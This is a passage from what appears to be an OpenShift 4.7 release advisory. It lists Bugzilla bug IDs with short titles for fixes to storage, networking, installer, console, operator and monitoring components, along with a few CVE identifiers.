Local storage operator doesn\u0027t include correctly populate LocalVolumeDiscoveryResult in console\n1886977 - [v2v]Incorrect VM Provider type displayed in UI while importing VMs through VMIO\n1887010 - Imagepruner met error \"Job has reached the specified backoff limit\" which causes image registry degraded\n1887026 - FC volume attach fails with \u201cno fc disk found\u201d error on OCP 4.6 PowerVM cluster\n1887040 - [upgrade] ovs pod crash for rhel worker when upgarde from 4.5 to 4.6\n1887046 - Event for LSO need update to avoid confusion\n1887088 - cluster-node-tuning-operator refers to missing cluster-node-tuned image\n1887375 - User should be able to specify volumeMode when creating pvc from web-console\n1887380 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console\n1887392 - openshift-apiserver: delegated authn/z should have ttl \u003e metrics/healthz/readyz/openapi interval\n1887428 - oauth-apiserver service should be monitored by prometheus\n1887441 - ingress misconfiguration may break authentication but ingress operator keeps reporting \"degraded: False\"\n1887454 - [sig-storage] In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (ext4)] volumes should store data\n1887456 - It is impossible to attach the default NIC to a bridge with the latest version of OVN Kubernetes\n1887465 - Deleted project is still referenced\n1887472 - unable to edit application group for KSVC via gestures (shift+Drag)\n1887488 - OCP 4.6:  Topology Manager OpenShift E2E test fails:  gu workload attached to SRIOV networks should let resource-aligned PODs have working SRIOV network interface\n1887509 - Openshift-tests conformance TopologyManager tests run when Machine Config Operator is not installed on cluster\n1887525 - Failures to set master HardwareDetails cannot easily be debugged\n1887545 - 4.5 to 4.6 upgrade fails when external network is configured on a bond device: ovs-configuration service fails and node becomes unreachable\n1887585 - ovn-masters stuck in crashloop after scale test\n1887651 - [Internal Mode] Object gateway (RGW) in unknown state after OCP upgrade. \n1887737 - Test TestImageRegistryRemovedWithImages is failing on e2e-vsphere-operator\n1887740 - cannot install descheduler operator after uninstalling it\n1887745 - API server is throwing 5xx error code for 42.11% of requests for LIST events\n1887750 - `oc explain localvolumediscovery` returns empty description\n1887751 - `oc explain localvolumediscoveryresult` returns empty description\n1887778 - Add ContainerRuntimeConfig gatherer\n1887783 - PVC upload cannot continue after approve the certificate\n1887797 - [CNV][V2V] Default network type is bridge for interface bound to POD network in VMWare migration wizard\n1887799 - User workload monitoring prometheus-config-reloader OOM\n1887850 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install test is flaky\n1887863 - Installer panics on invalid flavor\n1887864 - Clean up dependencies to avoid invalid scan flagging\n1887934 - TestForwardedHeaderPolicyAppend, TestForwardedHeaderPolicyReplace, and TestForwardedHeaderPolicyIfNone consistently fail because of case-sensitive comparison\n1887936 - Kube-scheduler should be able to parse v1beta1 KubeSchedulerConfig\n1888015 - workaround kubelet graceful termination of static pods bug\n1888028 - prevent extra cycle in aggregated apiservers\n1888036 - Operator details shows old CRD versions\n1888041 - non-terminating pods are going from running to pending\n1888072 - Setting Supermicro node to PXE boot via Redfish doesn\u0027t take affect\n1888073 - Operator controller continuously busy looping\n1888118 - Memory requests not specified for image registry operator\n1888150 - Install Operand Form on OperatorHub is displaying unformatted text\n1888172 - PR 209 didn\u0027t update the sample archive, but machineset and pdbs are now namespaced\n1888227 - Failed to deploy some of container image on the recent OCP 4.6 nightly build\n1888292 - Fix CVE-2015-7501 affecting agent-maven-3.5\n1888311 - p\u0026f: make SAR traffic from oauth and openshift apiserver exempt\n1888363 - namespaces crash in dev\n1888378 - [IPI on Azure] errors destroying cluster when Azure resource group was never created\n1888381 - instance:node_network_receive_bytes_excluding_lo:rate1m value twice expected\n1888464 - installer missing permission definitions for TagResources and UntagResources when installing in existing VPC\n1888494 - imagepruner pod is error when image registry storage is not configured\n1888565 - [OSP] machine-config-daemon-firstboot.service failed with \"error reading osImageURL from rpm-ostree\"\n1888595 - cluster-policy-controller logs shows error which reads initial monitor sync has error\n1888601 - The poddisruptionbudgets is using the operator service account, instead of gather\n1888657 - oc doesn\u0027t know its name\n1888663 - sdn starts after kube-apiserver, delay readyz until oauth-apiserver is reachable\n1888671 - Document the Cloud Provider\u0027s ignore-volume-az setting\n1888738 - quay.io/openshift/origin-must-gather:latest is not a multi-arch, manifest-list image\n1888763 - at least one of these parameters (Vendor, DeviceID or PfNames) has to be defined in nicSelector in CR %s\", cr.GetName()\n1888827 - ovnkube-master may segfault when trying to add IPs to a nil address set\n1888861 - need to pass dual-stack service CIDRs to kube-apiserver in dual-stack cluster\n1888866 - AggregatedAPIDown permanently firing after removing APIService\n1888870 - JS error when using autocomplete in YAML editor\n1888874 - hover message are not shown for some properties\n1888900 - align plugins versions\n1888985 - Cypress:  Fix \u0027Ensures buttons have discernible text\u0027 accesibility violation\n1889213 - The error message of uploading failure is not clear enough\n1889267 - Increase the time out for creating template and upload image in the terraform\n1889348 - Project link should be removed from Application Details page, since it is inaccurate (Application Stages)\n1889374 - Kiali feature won\u0027t work on fresh 4.6 cluster\n1889388 - ListBundles returns incorrect replaces/skips when bundles have been added via semver-skippatch mode\n1889420 - OCP failed to add vsphere disk when pod moved to new node during cluster upgrade\n1889515 - Accessibility - The symbols e.g checkmark in the Node \u003e overview page has no text description, label, or other accessible information\n1889529 - [Init-CR annotation] Inline alert shows operand instance was needed still appearing after creating an Operand instance\n1889540 - [4.5 upgrade][alert]CloudCredentialOperatorDown\n1889577 - Resources are not shown on project workloads page\n1889620 - [Azure] - Machineset not scaling when publicIP:true in disconnected Azure enviroment\n1889630 - Scheduling disabled popovers are missing for Node status in Node Overview and Details pages\n1889692 - Selected Capacity is showing wrong size\n1889694 - usbguard fails to install as RHCOS extension due to missing libprotobuf.so.15\n1889698 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off\n1889710 - Prometheus metrics on disk take more space compared to OCP 4.5\n1889721 - opm index add semver-skippatch mode does not respect prerelease versions\n1889724 - When LocalVolumeDiscovery CR is created form the LSO page User doesn\u0027t see the Disk tab\n1889767 - [vsphere] Remove certificate from upi-installer image\n1889779 - error when destroying a vSphere installation that failed early\n1889787 - OCP is flooding the oVirt engine with auth errors\n1889838 - race in Operator update after fix from bz1888073\n1889852 - support new AWS regions ap-east-1, af-south-1, eu-south-1\n1889863 - Router prints incorrect log message for namespace label selector\n1889891 - Backport timecache LRU fix\n1889912 - Drains can cause high CPU usage\n1889921 - Reported Degraded=False Available=False pair does not make sense\n1889928 - [e2e][automation] Add more tests for golden os\n1889943 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName\n1890038 - Infrastructure status.platform not migrated to status.platformStatus causes warnings\n1890074 - MCO extension kernel-headers is invalid\n1890104 - with Serverless 1.10 version of trigger/subscription/channel/IMC is V1 as latest\n1890130 - multitenant mode consistently fails CI\n1890141 - move off docker.io images for build/image-eco/templates/jenkins e2e\n1890145 - The mismatched of font size for Status Ready and Health Check secondary text\n1890180 - FieldDependency x-descriptor doesn\u0027t support non-sibling fields\n1890182 - DaemonSet with existing owner garbage collected\n1890228 - AWS: destroy stuck on route53 hosted zone not found\n1890235 - e2e: update Protractor\u0027s checkErrors logging\n1890250 - workers may fail to join the cluster during an update from 4.5\n1890256 - Replacing a master node on a baremetal IPI deployment gets stuck when deleting the machine of the unhealthy member\n1890270 - External IP doesn\u0027t work if the IP address is not assigned to a node\n1890361 - s390x: Generate new ostree rpm with fix for rootfs immutability\n1890456 - [vsphere] mapi_instance_create_failed doesn\u0027t work on vsphere\n1890467 - unable to edit an application without a service\n1890472 - [Kuryr] Bulk port creation exception not completely formatted\n1890494 - Error assigning Egress IP on GCP\n1890530 - cluster-policy-controller doesn\u0027t gracefully terminate\n1890630 - [Kuryr] Available port count not correctly calculated for alerts\n1890671 - [SA] verify-image-signature using service account does not work\n1890677 - \u0027oc image info\u0027 claims \u0027does not exist\u0027 for application/vnd.oci.image.manifest.v1+json manifest\n1890808 - New etcd alerts need to be added to the monitoring stack\n1890951 - Mirror of multiarch images together with cluster logging case problems. It doesn\u0027t sync the \"overall\" sha it syncs only the sub arch sha. \n1890984 - Rename operator-webhook-config to sriov-operator-webhook-config\n1890995 - wew-app should provide more insight into why image deployment failed\n1891023 - ovn-kubernetes rbac proxy never starts waiting for an incorrect API call\n1891047 - Helm chart fails to install using developer console because of TLS certificate error\n1891068 - [sig-instrumentation] Prometheus when installed on the cluster shouldn\u0027t report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured [Early] failing due to TargetDown alert from kube-scheduler\n1891080 - [LSO] When Localvolumeset and SC is already created before OCS install Creation of LVD and LVS is skipped when user click created storage cluster from UI\n1891108 - p\u0026f: Increase the concurrency share of workload-low priority level\n1891143 - CVO deadlocked while shutting down, shortly after fresh cluster install (metrics goroutine)\n1891189 - [LSO] max device limit is accepting negative values. PVC is not getting created and no error is shown\n1891314 - Display incompatible helm charts for installation (kubeVersion of cluster doesn\u0027t meet requirements of chart)\n1891362 - Wrong metrics count for openshift_build_result_total\n1891368 - fync should be fsync for etcdHighFsyncDurations alert\u0027s annotations.message\n1891374 - fync should be fsync for etcdHighFsyncDurations critical alert\u0027s annotations.message\n1891376 - Extra text in Cluster Utilization charts\n1891419 - Wrong detail head on network policy detail page. \n1891459 - Snapshot tests should report stderr of failed commands\n1891498 - Other machine config pools do not show during update\n1891543 - OpenShift 4.6/OSP install fails when node flavor has less than 25GB, even with dedicated storage\n1891551 - Clusterautoscaler doesn\u0027t scale up as expected\n1891552 - Handle missing labels as empty. \n1891555 - The windows oc.exe binary does not have version metadata\n1891559 - kuryr-cni cannot start new thread\n1891614 - [mlx] testpmd fails inside OpenShift pod using DevX version 19.11\n1891625 - [Release 4.7] Mutable LoadBalancer Scope\n1891702 - installer get pending when additionalTrustBundle is added into  install-config.yaml\n1891716 - OVN cluster upgrade from 4.6.1 to 4.7 fails\n1891740 - OperatorStatusChanged is noisy\n1891758 - the authentication operator may spam DeploymentUpdated event endlessly\n1891759 - Dockerfile builds cannot change /etc/pki/ca-trust\n1891816 - [UPI] [OSP] control-plane.yml provisioning playbook fails on OSP 16.1\n1891825 - Error message not very informative in case of mode mismatch\n1891898 - The ClusterServiceVersion can define Webhooks that cannot be created. \n1891951 - UI should show warning while creating pools with compression on\n1891952 - [Release 4.7] Apps Domain Enhancement\n1891993 - 4.5 to 4.6 upgrade doesn\u0027t remove deployments created by marketplace\n1891995 - OperatorHub displaying old content\n1891999 - Storage efficiency card showing wrong compression ratio\n1892004 - OCP 4.6 opm on Ubuntu 18.04.4 - error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28\u0027 not found (required by ./opm)\n1892167 - [SR-IOV] SriovNetworkNodePolicies apply ignoring the spec.nodeSelector. \n1892198 - TypeError in \u0027Performance Profile\u0027 tab displayed for \u0027Performance Addon Operator\u0027\n1892288 - assisted install workflow creates excessive control-plane disruption\n1892338 - HAProxyReloadFail alert only briefly fires in the event of a broken HAProxy config\n1892358 - [e2e][automation] update feature gate for kubevirt-gating job\n1892376 - Deleted netnamespace could not be re-created\n1892390 - TestOverwrite/OverwriteBundle/DefaultBehavior in operator-registry is flaky\n1892393 - TestListPackages is flaky\n1892448 - MCDPivotError alert/metric missing\n1892457 - NTO-shipped stalld needs to use FIFO for boosting. \n1892467 - linuxptp-daemon crash\n1892521 - [AWS] Startup bootstrap machine failed due to ignition file is missing in disconnected UPI env\n1892653 - User is unable to create KafkaSource with v1beta\n1892724 - VFS added to the list of devices of the nodeptpdevice CRD\n1892799 - Mounting additionalTrustBundle in the operator\n1893117 - Maintenance mode on vSphere blocks installation. \n1893351 - TLS secrets are not able to edit on console. \n1893362 - The ovs-xxxxx_openshift-sdn container does not terminate gracefully, slowing down reboots\n1893386 - false-positive ReadyIngressNodes_NoReadyIngressNodes: Auth operator makes risky \"worker\" assumption when guessing about ingress availability\n1893546 - Deploy using virtual media fails on node cleaning step\n1893601 - overview filesystem utilization of OCP is showing the wrong values\n1893645 - oc describe route SIGSEGV\n1893648 - Ironic image building process is not compatible with UEFI secure boot\n1893724 - OperatorHub generates incorrect RBAC\n1893739 - Force deletion doesn\u0027t work for snapshots if snapshotclass is already deleted\n1893776 - No useful metrics for image pull time available, making debugging issues there impossible\n1893798 - Lots of error messages starting with \"get namespace to enqueue Alertmanager instances failed\" in the logs of prometheus-operator\n1893832 - ErrorCount field is missing in baremetalhosts.metal3.io CRD\n1893889 - disabled dropdown items in the pf dropdown component are skipped over and unannounced by JAWS\n1893926 - Some \"Dynamic PV (block volmode)\" pattern storage e2e tests are wrongly skipped\n1893944 - Wrong product name for Multicloud Object Gateway\n1893953 - (release-4.7) Gather default StatefulSet configs\n1893956 - Installation always fails at \"failed to initialize the cluster: Cluster operator image-registry is still updating\"\n1893963 - [Testday] Workloads-\u003e Virtualization is not loading for Firefox browser\n1893972 - Should skip e2e test cases as early as possible\n1894013 - [v2v][Testday] VMware to CNV VM import]VMware URL: It is not clear that only the FQDN/IP address is required without \u0027https://\u0027\n1894020 - User with edit users cannot deploy images from their own namespace from the developer perspective\n1894025 - OCP 4.5 to 4.6 upgrade for \"aws-ebs-csi-driver-operator\" fails when \"defaultNodeSelector\" is set\n1894041 - [v2v][[Testday]VM import from VMware/RHV] VM import wizard: The target storage class name is not displayed if default storage class is used. \n1894065 - tag new packages to enable TLS support\n1894110 - Console shows wrong value for maxUnavailable and maxSurge when set to 0\n1894144 - CI runs of baremetal IPI are failing due to newer libvirt libraries\n1894146 - ironic-api used by metal3 is over provisioned and consumes a lot of RAM\n1894194 - KuryrPorts leftovers from 4.6 GA need to be deleted\n1894210 - Failed to encrypt OSDs on OCS4.6 installation (via UI)\n1894216 - Improve OpenShift Web Console availability\n1894275 - Fix CRO owners file to reflect node owner\n1894278 - \"database is locked\" error when adding bundle to index image\n1894330 - upgrade channels needs to be updated for 4.7\n1894342 - oauth-apiserver logs many \"[SHOULD NOT HAPPEN] failed to update managedFields for ... OAuthClient ... no corresponding type for oauth.openshift.io/v1, Kind=OAuthClient\"\n1894374 - Dont prevent the user from uploading a file with incorrect extension\n1894432 - [oVirt] sometimes installer timeout on tmp_import_vm\n1894477 - bash syntax error in nodeip-configuration.service\n1894503 - add automated test for Polarion CNV-5045\n1894519 - [OSP] External mode cluster creation disabled for Openstack and oVirt platform\n1894539 - [on-prem] Unable to deploy additional machinesets on separate subnets\n1894645 - Cinder volume provisioning crashes on nil cloud provider\n1894677 - image-pruner job is panicking: klog stack\n1894810 - Remove TechPreview Badge from Eventing in Serverless version 1.11.0\n1894860 - \u0027backend\u0027 CI job passing despite failing tests\n1894910 - Update the node to use the real-time kernel fails\n1894992 - All nightly jobs for e2e-metal-ipi failing due to ipa image missing tenacity package\n1895065 - Schema / Samples / Snippets Tabs are all selected at the same time\n1895099 - vsphere-upi and vsphere-upi-serial jobs time out waiting for bootstrap to complete in CI\n1895141 - panic in service-ca injector\n1895147 - Remove memory limits on openshift-dns\n1895169 - VM Template does not properly manage Mount Windows guest tools check box during VM creation\n1895268 - The bundleAPIs should NOT be empty\n1895309 - [OCP v47] The RHEL node scaleup fails due to \"No package matching \u0027cri-o-1.19.*\u0027 found available\" on OCP 4.7 cluster\n1895329 - The infra index filled with warnings \"WARNING: kubernetes.io/cinder built-in volume provider is now deprecated. The Cinder volume provider is deprecated and will be removed in a future release\"\n1895360 - Machine Config Daemon removes a file although its defined in the dropin\n1895367 - Missing image in metadata DB index.db in disconnected Operator Hub installation. OCP 4.6.1\n1895372 - Web console going blank after selecting any operator to install from OperatorHub\n1895385 - Revert KUBELET_LOG_LEVEL back to level 3\n1895423 - unable to edit an application with a custom builder image\n1895430 - unable to edit custom template application\n1895509 - Backup taken on one master cannot be restored on other masters\n1895537 - [sig-imageregistry][Feature:ImageExtract] Image extract should extract content from an image\n1895838 - oc explain description contains \u0027/\u0027\n1895908 - \"virtio\" option is not available when modifying a CD-ROM to disk type\n1895909 - e2e-metal-ipi-ovn-dualstack is failing\n1895919 - NTO fails to load kernel modules\n1895959 - configuring webhook token authentication should prevent cluster upgrades\n1895979 - Unable to get coreos-installer with --copy-network to work\n1896101 - [cnv][automation] Added negative tests for migration from VMWare and RHV\n1896160 - CI: Some cluster operators are not ready: marketplace (missing: Degraded)\n1896188 - [sig-cli] oc debug deployment configs from a build: local-busybox-1-build not completed\n1896218 - Occasional GCP install failures: Error setting IAM policy for project ...: googleapi: Error 400: Service account ... does not exist., badRequest\n1896229 - Current Rate of Bytes Received and Current Rate of Bytes Transmitted data can not be loaded\n1896244 - Found a panic in storage e2e test\n1896296 - Git links should avoid .git as part of the URL and should not link git:// urls in general\n1896302 - [e2e][automation] Fix 4.6 test failures\n1896365 - [Migration]The SDN migration cannot revert under some conditions\n1896384 - [ovirt IPI]: local coredns resolution not working\n1896446 - Git clone from private repository fails after upgrade OCP 4.5 to 4.6\n1896529 - Incorrect instructions in the Serverless operator and application quick starts\n1896645 - documentationBaseURL needs to be updated for 4.7\n1896697 - [Descheduler] policy.yaml param in cluster configmap is empty\n1896704 - Machine API components should honour cluster wide proxy settings\n1896732 - \"Attach to Virtual Machine OS\" button should not be visible on old clusters\n1896866 - File /etc/NetworkManager/system-connections/default_connection.nmconnection  is incompatible with SR-IOV operator\n1896898 - ovs-configuration.service fails when multiple IPv6 default routes are provided via RAs over the same interface and deployment bootstrap fails\n1896918 - start creating new-style Secrets for AWS\n1896923 - DNS pod /metrics exposed on anonymous http port\n1896977 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters\n1897003 - VNC console cannot be connected after visit it in new window\n1897008 - Cypress: reenable check for \u0027aria-hidden-focus\u0027 rule \u0026 checkA11y test for modals\n1897026 - [Migration] With updating optional network operator configuration, migration stucks on MCO\n1897039 - router pod keeps printing log: template \"msg\"=\"router reloaded\"  \"output\"=\"[WARNING] 316/065823 (15) : parsing [/var/lib/haproxy/conf/haproxy.config:52]: option \u0027http-use-htx\u0027 is deprecated and ignored\n1897050 - [IBM Power] LocalVolumeSet provisions boot partition as PV. \n1897073 - [OCP 4.5] wrong netid assigned to Openshift projects/namespaces\n1897138 - oVirt provider uses depricated cluster-api project\n1897142 - When scaling replicas to zero, Octavia loadbalancer pool members are not updated accordingly\n1897252 - Firing alerts are not showing up in console UI after cluster is up for some time\n1897354 - Operator installation showing success, but Provided APIs are missing\n1897361 - The MCO GCP-OP tests fail consistently on containerruntime tests with \"connection refused\"\n1897412 - [sriov]disableDrain did not be updated in CRD of manifest\n1897423 - Max unavailable and Max surge value are not shown on Deployment Config Details page\n1897516 - Baremetal IPI deployment with IPv6 control plane fails when the nodes obtain both SLAAC and DHCPv6 addresses as they set their hostname to \u0027localhost\u0027\n1897520 - After restarting nodes the image-registry co is in degraded true state. \n1897584 - Add casc plugins\n1897603 - Cinder volume attachment detection failure in Kubelet\n1897604 - Machine API deployment fails: Kube-Controller-Manager can\u0027t reach API: \"Unauthorized\"\n1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers\n1897641 - Baremetal IPI with IPv6 control plane: nodes respond with duplicate packets to ICMP6 echo requests\n1897676 - [CI] [Azure] [UPI] CI failing since 4.6 changes in ignition\n1897830 - [GSS] Unable to deploy OCS 4.5.2 on OCP 4.6.1, cannot `Create OCS Cluster Service`\n1897891 - [RFE][v2v][UI][CNV VM import] Providing error message or/and block migration when vddk-init-image is missing\n1897897 - ptp lose sync openshift 4.6\n1898036 - no network after reboot (IPI)\n1898045 - AWS EBS CSI Driver can not get updated cloud credential secret automatically\n1898097 - mDNS floods the baremetal network\n1898118 - Lack of logs on some image stream tests make hard to find root cause of a problem\n1898134 - Descheduler logs show absolute values instead of percentage when LowNodeUtilization strategy is applied\n1898159 - kcm operator shall pass --allocate-node-cidrs=false to kcm for ovn-kube and openshift-sdn cluster\n1898174 - [OVN] EgressIP does not guard against node IP assignment\n1898194 - GCP: can\u0027t install on custom machine types\n1898238 - Installer validations allow same floating IP for API and Ingress\n1898268 - [OVN]: `make check` broken on 4.6\n1898289 - E2E test: Use KUBEADM_PASSWORD_FILE by default\n1898320 - Incorrect Apostrophe  Translation of  \"it\u0027s\" in Scheduling Disabled Popover\n1898357 - Within the operatorhub details view, long unbroken text strings do not wrap cause breaking display. \n1898407 - [Deployment timing regression] Deployment takes longer with 4.7\n1898417 - GCP: the dns targets in Google Cloud DNS is not updated after recreating loadbalancer service\n1898487 - [oVirt] Node is not removed when VM has been removed from oVirt engine\n1898500 - Failure to upgrade operator when a Service is included in a Bundle\n1898517 - Ironic auto-discovery may result in rogue nodes registered in ironic\n1898532 - Display names defined in specDescriptors not respected\n1898580 - When adding more than one node selector to the sriovnetworknodepolicy, the cni and the device plugin pods are constantly rebooted\n1898613 - Whereabouts should exclude IPv6 ranges\n1898655 - [oVirt] Node deleted in oVirt should cause the Machine to go into a Failed phase\n1898679 - Operand creation form - Required \"type: object\" properties (Accordion component) are missing red asterisk\n1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability\n1898745 - installation failing with CVO reporting openshift-samples not rolled out, samples not setting versions in its ClusterOperator\n1898839 - Wrong YAML in operator metadata\n1898851 - Multiple Pods access the same volume on the same node e2e test cases are missed from aws ebs csi driver e2e test job\n1898873 - Remove TechPreview Badge from Monitoring\n1898954 - Backup script does not take /etc/kubernetes/static-pod-resources on a reliable way\n1899111 - [RFE] Update jenkins-maven-agen to maven36\n1899128 - VMI details screen -\u003e show the warning that it is preferable to have a VM only if the VM actually does not exist\n1899175 - bump the RHCOS boot images for 4.7\n1899198 - Use new packages for ipa ramdisks\n1899200 - In Installed Operators page I cannot search for an Operator by it\u0027s name\n1899220 - Support AWS IMDSv2\n1899350 - configure-ovs.sh doesn\u0027t configure bonding options\n1899433 - When Creating OCS from ocs wizard Step Discover Disks shows Error \"An error occurred Not Found\"\n1899459 - Failed to start monitoring pods once the operator removed from override list of CVO\n1899515 - Passthrough credentials are not immediately re-distributed on update\n1899575 - update discovery burst to reflect lots of CRDs on openshift clusters\n1899582 - update discovery burst to reflect lots of CRDs on openshift clusters\n1899588 - Operator objects are re-created after all other associated resources have been deleted\n1899600 - Increased etcd fsync latency as of OCP 4.6\n1899603 - workers-rhel7 CI jobs failing: Failed to remove rollback: error running rpm-ostree cleanup\n1899627 - Project dashboard Active status using small icon\n1899725 - Pods table does not wrap well with quick start sidebar open\n1899746 - [ovn] error while waiting on flows for pod: OVS sandbox port is no longer active (probably due to a subsequent CNI ADD)\n1899760 - etcd_request_duration_seconds_bucket metric has excessive cardinality\n1899835 - catalog-operator repeatedly crashes with \"runtime error: index out of range [0] with length 0\"\n1899839 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap\n1899853 - additionalSecurityGroupIDs not working for master nodes\n1899922 - NP changes sometimes influence new pods. \n1899949 - [Platform] Remove restriction on disk type selection for LocalVolumeSet\n1900008 - Fix internationalized sentence fragments in ImageSearch.tsx\n1900010 - Fix internationalized sentence fragments in BuildImageSelector.tsx\n1900020 - Remove \u0026apos; from internationalized keys\n1900022 - Search Page - Top labels field is not applied to selected Pipeline resources\n1900030 - disruption_tests: [sig-imageregistry] Image registry remain available failing consistently\n1900126 - Creating a VM results in suggestion to create a default storage class when one already exists\n1900138 - [OCP on RHV] Remove insecure mode from the installer\n1900196 - stalld is not restarted after crash\n1900239 - Skip \"subPath should be able to unmount\" NFS test\n1900322 - metal3 pod\u0027s toleration for key: node-role.kubernetes.io/master currently matches on exact value matches but should match on Exists\n1900377 - [e2e][automation] create new css selector for active users\n1900496 - (release-4.7) Collect spec config for clusteroperator resources\n1900672 - (s390x) Upgrade from old LUKS to new not working with DASD disks\n1900699 - Impossible to add new Node on OCP 4.6 using large ECKD disks - fdasd issue\n1900759 - include qemu-guest-agent by default\n1900790 - Track all resource counts via telemetry\n1900835 - Multus errors when cachefile is not found\n1900935 - `oc adm release mirror` panic panic: runtime error\n1900989 - accessing the route cannot wake up the idled resources\n1901040 - When scaling down the status of the node is stuck on deleting\n1901057 - authentication operator health check failed when installing a cluster behind proxy\n1901107 - pod donut shows incorrect information\n1901111 - Installer dependencies are broken\n1901200 - linuxptp-daemon crash when enable debug log level\n1901301 - CBO should handle platform=BM without provisioning CR\n1901355 - [Azure][4.7] Invalid vm size from customized compute nodes does not fail properly\n1901363 - High Podready Latency due to timed out waiting for annotations\n1901373 - redundant bracket on snapshot restore button\n1901376 - [on-prem] Upgrade from 4.6 to 4.7 failed with \"timed out waiting for the condition during waitForControllerConfigToBeCompleted: controllerconfig is not completed: ControllerConfig has not completed: completed(false) running(false) failing(true\"\n1901395 - \"Edit virtual machine template\" action link should be removed\n1901472 - [OSP] Bootstrap and master nodes use different keepalived unicast setting\n1901517 - RHCOS 4.6.1 uses a single NetworkManager connection for multiple NICs when using default DHCP\n1901531 - Console returns a blank page while trying to create an operator Custom CR with Invalid Schema\n1901594 - Kubernetes resource CRUD operations.Kubernetes resource CRUD operations Pod \"before all\" hook for \"creates the resource instance\"\n1901604 - CNO blocks editing Kuryr options\n1901675 - [sig-network] multicast when using one of the plugins \u0027redhat/openshift-ovs-multitenant, redhat/openshift-ovs-networkpolicy\u0027 should allow multicast traffic in namespaces where it is enabled\n1901909 - The device plugin pods / cni pod are restarted every 5 minutes\n1901982 - [sig-builds][Feature:Builds] build can reference a cluster service  with a build being created from new-build should be able to run a build that references a cluster service\n1902019 - when podTopologySpreadConstraint strategy is enabled for descheduler it throws error\n1902059 - Wire a real signer for service accout issuer\n1902091 - `cluster-image-registry-operator` pod leaves connections open when fails connecting S3 storage\n1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service\n1902157 - The DaemonSet machine-api-termination-handler couldn\u0027t allocate Pod\n1902253 - MHC status doesnt set RemediationsAllowed = 0\n1902299 - Failed to mirror operator catalog - error: destination registry required\n1902545 - Cinder csi driver node pod should add nodeSelector for Linux\n1902546 - Cinder csi driver node pod doesn\u0027t run on master node\n1902547 - Cinder csi driver controller pod doesn\u0027t run on master node\n1902552 - Cinder csi driver does not use the downstream images\n1902595 - Project workloads list view doesn\u0027t show alert icon and hover message\n1902600 - Container csi-snapshotter in Cinder csi driver needs to use ImagePullPolicy=IfNotPresent\n1902601 - Cinder csi driver pods run as BestEffort qosClass\n1902653 - [BM][IPI] Master deployment failed: No valid host was found. Reason: No conductor service registered which supports driver redfish for conductor group\n1902702 - [sig-auth][Feature:LDAP][Serial] ldap group sync can sync groups from ldap: oc cp over non-existing directory/file fails\n1902746 - [BM][IP] Master deployment failed - Base.1.0.GeneralError: database is locked\n1902824 - failed to generate semver informed package manifest: unable to determine default channel\n1902894 - hybrid-overlay-node crashing trying to get node object during initialization\n1902969 - Cannot load vmi detail page\n1902981 - It should default to current namespace when create vm from template\n1902996 - [AWS] UPI on USGov, bootstrap machine can not fetch ignition file  via s3:// URI\n1903033 - duplicated lines of imageContentSources is seen when mirror release image to local registry\n1903034 - OLM continuously printing debug logs\n1903062 - [Cinder csi driver] Deployment mounted volume have no write access\n1903078 - Deleting VolumeSnapshotClass makes VolumeSnapshot not Ready\n1903107 - Enable vsphere-problem-detector e2e tests\n1903164 - OpenShift YAML editor jumps to top every few seconds\n1903165 - Improve Canary Status Condition handling for e2e tests\n1903172 - Column Management: Fix sticky footer on scroll\n1903186 - [Descheduler] cluster logs should report some info when PodTopologySpreadConstraints strategy is enabled\n1903188 - [Descheduler] cluster log reports failed to validate server configuration\" err=\"unsupported log format:\n1903192 - Role name missing on create role binding form\n1903196 - Popover positioning is misaligned for Overview Dashboard status items\n1903206 - Ingress controller incorrectly routes traffic to non-ready pods/backends. \n1903226 - MutatingWebhookConfiguration pod-identity-webhook does not exclude critical control-plane components\n1903248 - Backport Upstream Static Pod UID patch\n1903277 - Deprovisioning Not Deleting Security Groups [VpcLimitExceeded on e2e-aws tests]\n1903290 - Kubelet repeatedly log the same log line from exited containers\n1903346 - PV backed by FC lun is not being unmounted properly and this leads to IO errors / xfs corruption. \n1903382 - Panic when task-graph is canceled with a TaskNode with no tasks\n1903400 - Migrate a VM which is not running goes to pending state\n1903402 - Nic/Disk on VMI overview should link to VMI\u0027s nic/disk page\n1903414 - NodePort is not working when configuring an egress IP address\n1903424 - mapi_machine_phase_transition_seconds_sum doesn\u0027t work\n1903464 - \"Evaluating rule failed\" for \"record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum\" and \"record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum\"\n1903639 - Hostsubnet gatherer produces wrong output\n1903651 - Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service\n1903660 - Cannot install with Assisted Installer on top of IPv6 since network provider is not started\n1903674 - [sig-apps] ReplicationController should serve a basic image on each replica with a private image\n1903717 - Handle different Pod selectors for metal3 Deployment\n1903733 - Scale up followed by scale down can delete all running workers\n1903917 - Failed to load \"Developer Catalog\" page\n1903999 - Httplog response code is always zero\n1904026 - The quota controllers should resync on new resources and make progress\n1904064 - Automated cleaning is disabled by default\n1904124 - DHCP to static lease script doesn\u0027t work correctly if starting with infinite leases\n1904125 - Boostrap VM .ign image gets added into \u0027default\u0027 pool instead of \u003ccluster-name\u003e-\u003cid\u003e-bootstrap\n1904131 - kuryr tempest plugin test test_ipblock_network_policy_sg_rules fails\n1904133 - KubeletConfig flooded with failure conditions\n1904161 - AlertmanagerReceiversNotConfigured fires unconditionally on alertmanager restart\n1904243 - RHCOS 4.6.1 missing ISCSI initiatorname.iscsi !\n1904244 - MissingKey errors for two plugins using i18next.t\n1904262 - clusterresourceoverride-operator has version: 1.0.0 every build\n1904296 - VPA-operator has version: 1.0.0 every build\n1904297 - The index image generated by \"opm index prune\" leaves unrelated images\n1904305 - Should have scroll-down bar for the field which the values list has too many results under dashboards\n1904385 - [oVirt] registry cannot mount volume on 4.6.4 -\u003e 4.6.6 upgrade\n1904497 - vsphere-problem-detector: Run on vSphere cloud only\n1904501 - 